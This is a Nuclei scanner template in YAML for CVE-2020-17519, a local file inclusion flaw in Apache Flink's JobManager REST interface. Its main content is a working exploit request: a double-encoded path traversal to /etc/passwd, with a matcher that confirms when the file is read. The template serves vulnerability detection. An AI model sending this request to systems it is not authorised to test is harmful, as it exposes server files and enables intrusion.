40 lines
1.5 KiB
YAML
40 lines
1.5 KiB
YAML
id: CVE-2020-17519
|
|
|
|
info:
|
|
name: Apache Flink - Local File Inclusion
|
|
author: pdteam
|
|
severity: high
|
|
description: Apache Flink 1.11.0 (and released in 1.11.1 and 1.11.2 as well) allows attackers to read any file on the local filesystem of the JobManager through the REST interface of the JobManager process (aka local file inclusion).
|
|
reference:
|
|
- https://github.com/B1anda0/CVE-2020-17519
|
|
- https://lists.apache.org/thread.html/r6843202556a6d0bce9607ebc02e303f68fc88e9038235598bde3b50d%40%3Cdev.flink.apache.org%3E
|
|
- https://lists.apache.org/thread.html/r6843202556a6d0bce9607ebc02e303f68fc88e9038235598bde3b50d@%3Cdev.flink.apache.org%3E
|
|
- https://lists.apache.org/thread.html/r6843202556a6d0bce9607ebc02e303f68fc88e9038235598bde3b50d@%3Cuser.flink.apache.org%3E
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-17519
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2020-17519
|
|
cwe-id: CWE-552
|
|
cpe: cpe:2.3:a:apache:flink:*:*:*:*:*:*:*:*
|
|
epss-score: 0.97486
|
|
tags: cve,cve2020,apache,lfi,flink
|
|
metadata:
|
|
max-request: 1
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd"
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 200
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
part: body
|
|
|
|
# Enhanced by mp on 2022/07/13
|